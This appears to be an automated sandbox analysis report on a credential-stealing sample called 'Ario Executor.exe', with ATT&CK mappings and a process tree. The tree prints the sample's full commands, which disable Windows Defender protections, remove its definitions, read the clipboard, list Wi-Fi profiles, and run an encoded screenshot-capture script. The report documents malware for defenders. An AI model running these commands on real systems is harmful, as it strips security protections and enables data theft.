42bea851bc4a2dde756333aebd2afe7e06a07febb222b4efeda6e66eb904b651

Analysis

max time kernel
32s
max time network
37s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
24-01-2025 04:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ario Executor.exe
Size

7.6MB
MD5

00530ba821d6a8917cd89fa7c1236d15
SHA1

e5e2aca747eac3e9fb4725cc4a768ef1ef88cdee
SHA256

42bea851bc4a2dde756333aebd2afe7e06a07febb222b4efeda6e66eb904b651
SHA512

75b23558b2af7447cc61a6678b010d1445000c739d8ae4fa30d94455473ba830bf0e8cd78d149ff217f503a3f9645614c33afef0bc1e2485f41c5f6bcc794ca7
SSDEEP

196608:XpvD+kdXwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWQ:F5uIHL7HmBYXrYoaUNX

Score

10^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

defense_evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5104	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2660	powershell.exe
2468	powershell.exe
2500	powershell.exe
4388	powershell.exe
4804	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Ario Executor.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2028	cmd.exe
4396	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3584	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe
904	Ario Executor.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2408	tasklist.exe
3424	tasklist.exe
2116	tasklist.exe
1244	tasklist.exe
3212	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000046192-21.dat	upx
behavioral1/memory/904-25-0x00007FF81C980000-0x00007FF81CFE5000-memory.dmp	upx
behavioral1/files/0x0028000000046184-27.dat	upx
behavioral1/files/0x0028000000046190-29.dat	upx
behavioral1/memory/904-48-0x00007FF835430000-0x00007FF83543F000-memory.dmp	upx
behavioral1/files/0x002800000004618b-47.dat	upx
behavioral1/files/0x002800000004618a-46.dat	upx
behavioral1/files/0x0028000000046189-45.dat	upx
behavioral1/files/0x0028000000046188-44.dat	upx
behavioral1/files/0x0028000000046187-43.dat	upx
behavioral1/files/0x0028000000046186-42.dat	upx
behavioral1/files/0x0028000000046185-41.dat	upx
behavioral1/files/0x0028000000046183-40.dat	upx
behavioral1/files/0x0028000000046197-39.dat	upx
behavioral1/files/0x0028000000046196-38.dat	upx
behavioral1/files/0x0028000000046195-37.dat	upx
behavioral1/files/0x0028000000046191-34.dat	upx
behavioral1/files/0x002800000004618f-33.dat	upx
behavioral1/memory/904-31-0x00007FF831020000-0x00007FF831047000-memory.dmp	upx
behavioral1/memory/904-54-0x00007FF82C8E0000-0x00007FF82C90B000-memory.dmp	upx
behavioral1/memory/904-56-0x00007FF82E7D0000-0x00007FF82E7E9000-memory.dmp	upx
behavioral1/memory/904-58-0x00007FF82C810000-0x00007FF82C835000-memory.dmp	upx
behavioral1/memory/904-60-0x00007FF81C800000-0x00007FF81C97F000-memory.dmp	upx
behavioral1/memory/904-62-0x00007FF82C8C0000-0x00007FF82C8D9000-memory.dmp	upx
behavioral1/memory/904-64-0x00007FF8352B0000-0x00007FF8352BD000-memory.dmp	upx
behavioral1/memory/904-67-0x00007FF82C7D0000-0x00007FF82C803000-memory.dmp	upx
behavioral1/memory/904-66-0x00007FF81C980000-0x00007FF81CFE5000-memory.dmp	upx
behavioral1/memory/904-71-0x00007FF82B770000-0x00007FF82B83E000-memory.dmp	upx
behavioral1/memory/904-72-0x00007FF81C2C0000-0x00007FF81C7F3000-memory.dmp	upx
behavioral1/memory/904-74-0x00007FF831020000-0x00007FF831047000-memory.dmp	upx
behavioral1/memory/904-79-0x00007FF831270000-0x00007FF83127D000-memory.dmp	upx
behavioral1/memory/904-81-0x00007FF81C200000-0x00007FF81C2B3000-memory.dmp	upx
behavioral1/memory/904-78-0x00007FF82C8E0000-0x00007FF82C90B000-memory.dmp	upx
behavioral1/memory/904-76-0x00007FF82C4D0000-0x00007FF82C4E4000-memory.dmp	upx
behavioral1/memory/904-92-0x00007FF82C810000-0x00007FF82C835000-memory.dmp	upx
behavioral1/memory/904-104-0x00007FF81C800000-0x00007FF81C97F000-memory.dmp	upx
behavioral1/memory/904-286-0x00007FF82C7D0000-0x00007FF82C803000-memory.dmp	upx
behavioral1/memory/904-288-0x00007FF82B770000-0x00007FF82B83E000-memory.dmp	upx
behavioral1/memory/904-289-0x00007FF81C2C0000-0x00007FF81C7F3000-memory.dmp	upx
behavioral1/memory/904-307-0x00007FF81C980000-0x00007FF81CFE5000-memory.dmp	upx
behavioral1/memory/904-313-0x00007FF81C800000-0x00007FF81C97F000-memory.dmp	upx
behavioral1/memory/904-358-0x00007FF831020000-0x00007FF831047000-memory.dmp	upx
behavioral1/memory/904-357-0x00007FF835430000-0x00007FF83543F000-memory.dmp	upx
behavioral1/memory/904-342-0x00007FF81C980000-0x00007FF81CFE5000-memory.dmp	upx
behavioral1/memory/904-370-0x00007FF81C200000-0x00007FF81C2B3000-memory.dmp	upx
behavioral1/memory/904-369-0x00007FF831270000-0x00007FF83127D000-memory.dmp	upx
behavioral1/memory/904-368-0x00007FF82C4D0000-0x00007FF82C4E4000-memory.dmp	upx
behavioral1/memory/904-367-0x00007FF81C2C0000-0x00007FF81C7F3000-memory.dmp	upx
behavioral1/memory/904-366-0x00007FF82B770000-0x00007FF82B83E000-memory.dmp	upx
behavioral1/memory/904-365-0x00007FF82C7D0000-0x00007FF82C803000-memory.dmp	upx
behavioral1/memory/904-364-0x00007FF8352B0000-0x00007FF8352BD000-memory.dmp	upx
behavioral1/memory/904-363-0x00007FF82C8C0000-0x00007FF82C8D9000-memory.dmp	upx
behavioral1/memory/904-362-0x00007FF81C800000-0x00007FF81C97F000-memory.dmp	upx
behavioral1/memory/904-361-0x00007FF82C810000-0x00007FF82C835000-memory.dmp	upx
behavioral1/memory/904-360-0x00007FF82E7D0000-0x00007FF82E7E9000-memory.dmp	upx
behavioral1/memory/904-359-0x00007FF82C8E0000-0x00007FF82C90B000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5056	cmd.exe
8	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3940	WMIC.exe
4340	WMIC.exe
4724	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
216	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
2500	powershell.exe
1836	WMIC.exe
1836	WMIC.exe
1836	WMIC.exe
1836	WMIC.exe
2500	powershell.exe
2660	powershell.exe
2660	powershell.exe
4340	WMIC.exe
4340	WMIC.exe
4340	WMIC.exe
4340	WMIC.exe
4724	WMIC.exe
4724	WMIC.exe
4724	WMIC.exe
4724	WMIC.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
4396	powershell.exe
4396	powershell.exe
3256	WMIC.exe
3256	WMIC.exe
3256	WMIC.exe
3256	WMIC.exe
4396	powershell.exe
1496	powershell.exe
1496	powershell.exe
1496	powershell.exe
4388	powershell.exe
4388	powershell.exe
4388	powershell.exe
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
4956	WMIC.exe
4956	WMIC.exe
4956	WMIC.exe
4956	WMIC.exe
1404	WMIC.exe
1404	WMIC.exe
1404	WMIC.exe
1404	WMIC.exe
1956	WMIC.exe
1956	WMIC.exe
1956	WMIC.exe
1956	WMIC.exe
4804	powershell.exe
4804	powershell.exe
3940	WMIC.exe
3940	WMIC.exe
3940	WMIC.exe
3940	WMIC.exe
3888	powershell.exe
3888	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2408	tasklist.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeIncreaseQuotaPrivilege	1836	WMIC.exe
Token: SeSecurityPrivilege	1836	WMIC.exe
Token: SeTakeOwnershipPrivilege	1836	WMIC.exe
Token: SeLoadDriverPrivilege	1836	WMIC.exe
Token: SeSystemProfilePrivilege	1836	WMIC.exe
Token: SeSystemtimePrivilege	1836	WMIC.exe
Token: SeProfSingleProcessPrivilege	1836	WMIC.exe
Token: SeIncBasePriorityPrivilege	1836	WMIC.exe
Token: SeCreatePagefilePrivilege	1836	WMIC.exe
Token: SeBackupPrivilege	1836	WMIC.exe
Token: SeRestorePrivilege	1836	WMIC.exe
Token: SeShutdownPrivilege	1836	WMIC.exe
Token: SeDebugPrivilege	1836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1836	WMIC.exe
Token: SeRemoteShutdownPrivilege	1836	WMIC.exe
Token: SeUndockPrivilege	1836	WMIC.exe
Token: SeManageVolumePrivilege	1836	WMIC.exe
Token: 33	1836	WMIC.exe
Token: 34	1836	WMIC.exe
Token: 35	1836	WMIC.exe
Token: 36	1836	WMIC.exe
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeIncreaseQuotaPrivilege	1836	WMIC.exe
Token: SeSecurityPrivilege	1836	WMIC.exe
Token: SeTakeOwnershipPrivilege	1836	WMIC.exe
Token: SeLoadDriverPrivilege	1836	WMIC.exe
Token: SeSystemProfilePrivilege	1836	WMIC.exe
Token: SeSystemtimePrivilege	1836	WMIC.exe
Token: SeProfSingleProcessPrivilege	1836	WMIC.exe
Token: SeIncBasePriorityPrivilege	1836	WMIC.exe
Token: SeCreatePagefilePrivilege	1836	WMIC.exe
Token: SeBackupPrivilege	1836	WMIC.exe
Token: SeRestorePrivilege	1836	WMIC.exe
Token: SeShutdownPrivilege	1836	WMIC.exe
Token: SeDebugPrivilege	1836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1836	WMIC.exe
Token: SeRemoteShutdownPrivilege	1836	WMIC.exe
Token: SeUndockPrivilege	1836	WMIC.exe
Token: SeManageVolumePrivilege	1836	WMIC.exe
Token: 33	1836	WMIC.exe
Token: 34	1836	WMIC.exe
Token: 35	1836	WMIC.exe
Token: 36	1836	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2500	powershell.exe
Token: SeSecurityPrivilege	2500	powershell.exe
Token: SeTakeOwnershipPrivilege	2500	powershell.exe
Token: SeLoadDriverPrivilege	2500	powershell.exe
Token: SeSystemProfilePrivilege	2500	powershell.exe
Token: SeSystemtimePrivilege	2500	powershell.exe
Token: SeProfSingleProcessPrivilege	2500	powershell.exe
Token: SeIncBasePriorityPrivilege	2500	powershell.exe
Token: SeCreatePagefilePrivilege	2500	powershell.exe
Token: SeBackupPrivilege	2500	powershell.exe
Token: SeRestorePrivilege	2500	powershell.exe
Token: SeShutdownPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeSystemEnvironmentPrivilege	2500	powershell.exe
Token: SeRemoteShutdownPrivilege	2500	powershell.exe
Token: SeUndockPrivilege	2500	powershell.exe
Token: SeManageVolumePrivilege	2500	powershell.exe
Token: 33	2500	powershell.exe
Token: 34	2500	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 652 wrote to memory of 904	652	Ario Executor.exe	81
PID 652 wrote to memory of 904	652	Ario Executor.exe	81
PID 904 wrote to memory of 3920	904	Ario Executor.exe	83
PID 904 wrote to memory of 3920	904	Ario Executor.exe	83
PID 904 wrote to memory of 3940	904	Ario Executor.exe	84
PID 904 wrote to memory of 3940	904	Ario Executor.exe	84
PID 904 wrote to memory of 1624	904	Ario Executor.exe	87
PID 904 wrote to memory of 1624	904	Ario Executor.exe	87
PID 904 wrote to memory of 1524	904	Ario Executor.exe	89
PID 904 wrote to memory of 1524	904	Ario Executor.exe	89
PID 3940 wrote to memory of 2500	3940	cmd.exe	91
PID 3940 wrote to memory of 2500	3940	cmd.exe	91
PID 1624 wrote to memory of 2408	1624	cmd.exe	92
PID 1624 wrote to memory of 2408	1624	cmd.exe	92
PID 1524 wrote to memory of 1836	1524	cmd.exe	93
PID 1524 wrote to memory of 1836	1524	cmd.exe	93
PID 3920 wrote to memory of 2660	3920	cmd.exe	95
PID 3920 wrote to memory of 2660	3920	cmd.exe	95
PID 904 wrote to memory of 2600	904	Ario Executor.exe	97
PID 904 wrote to memory of 2600	904	Ario Executor.exe	97
PID 2600 wrote to memory of 2732	2600	cmd.exe	99
PID 2600 wrote to memory of 2732	2600	cmd.exe	99
PID 904 wrote to memory of 2856	904	Ario Executor.exe	100
PID 904 wrote to memory of 2856	904	Ario Executor.exe	100
PID 2856 wrote to memory of 4084	2856	cmd.exe	102
PID 2856 wrote to memory of 4084	2856	cmd.exe	102
PID 904 wrote to memory of 1632	904	Ario Executor.exe	103
PID 904 wrote to memory of 1632	904	Ario Executor.exe	103
PID 1632 wrote to memory of 4340	1632	cmd.exe	105
PID 1632 wrote to memory of 4340	1632	cmd.exe	105
PID 904 wrote to memory of 2932	904	Ario Executor.exe	106
PID 904 wrote to memory of 2932	904	Ario Executor.exe	106
PID 2932 wrote to memory of 4724	2932	cmd.exe	108
PID 2932 wrote to memory of 4724	2932	cmd.exe	108
PID 3940 wrote to memory of 5104	3940	cmd.exe	109
PID 3940 wrote to memory of 5104	3940	cmd.exe	109
PID 904 wrote to memory of 1788	904	Ario Executor.exe	110
PID 904 wrote to memory of 1788	904	Ario Executor.exe	110
PID 1788 wrote to memory of 2468	1788	cmd.exe	112
PID 1788 wrote to memory of 2468	1788	cmd.exe	112
PID 904 wrote to memory of 2244	904	Ario Executor.exe	113
PID 904 wrote to memory of 2244	904	Ario Executor.exe	113
PID 904 wrote to memory of 2992	904	Ario Executor.exe	114
PID 904 wrote to memory of 2992	904	Ario Executor.exe	114
PID 2244 wrote to memory of 3424	2244	cmd.exe	117
PID 2244 wrote to memory of 3424	2244	cmd.exe	117
PID 904 wrote to memory of 2736	904	Ario Executor.exe	118
PID 904 wrote to memory of 2736	904	Ario Executor.exe	118
PID 2992 wrote to memory of 2116	2992	cmd.exe	177
PID 2992 wrote to memory of 2116	2992	cmd.exe	177
PID 904 wrote to memory of 2028	904	Ario Executor.exe	120
PID 904 wrote to memory of 2028	904	Ario Executor.exe	120
PID 904 wrote to memory of 1936	904	Ario Executor.exe	123
PID 904 wrote to memory of 1936	904	Ario Executor.exe	123
PID 904 wrote to memory of 2020	904	Ario Executor.exe	164
PID 904 wrote to memory of 2020	904	Ario Executor.exe	164
PID 904 wrote to memory of 5056	904	Ario Executor.exe	126
PID 904 wrote to memory of 5056	904	Ario Executor.exe	126
PID 2028 wrote to memory of 4396	2028	cmd.exe	171
PID 2028 wrote to memory of 4396	2028	cmd.exe	171
PID 904 wrote to memory of 560	904	Ario Executor.exe	129
PID 904 wrote to memory of 560	904	Ario Executor.exe	129
PID 2736 wrote to memory of 3256	2736	cmd.exe	130
PID 2736 wrote to memory of 3256	2736	cmd.exe	130

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4712	attrib.exe
1316	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ario Executor.exe
"C:\Users\Admin\AppData\Local\Temp\Ario Executor.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:652
- C:\Users\Admin\AppData\Local\Temp\Ario Executor.exe
  "C:\Users\Admin\AppData\Local\Temp\Ario Executor.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ario Executor.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ario Executor.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2500
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1624
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2856
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2992
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1936
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2020
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5056
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:560
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5060
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvA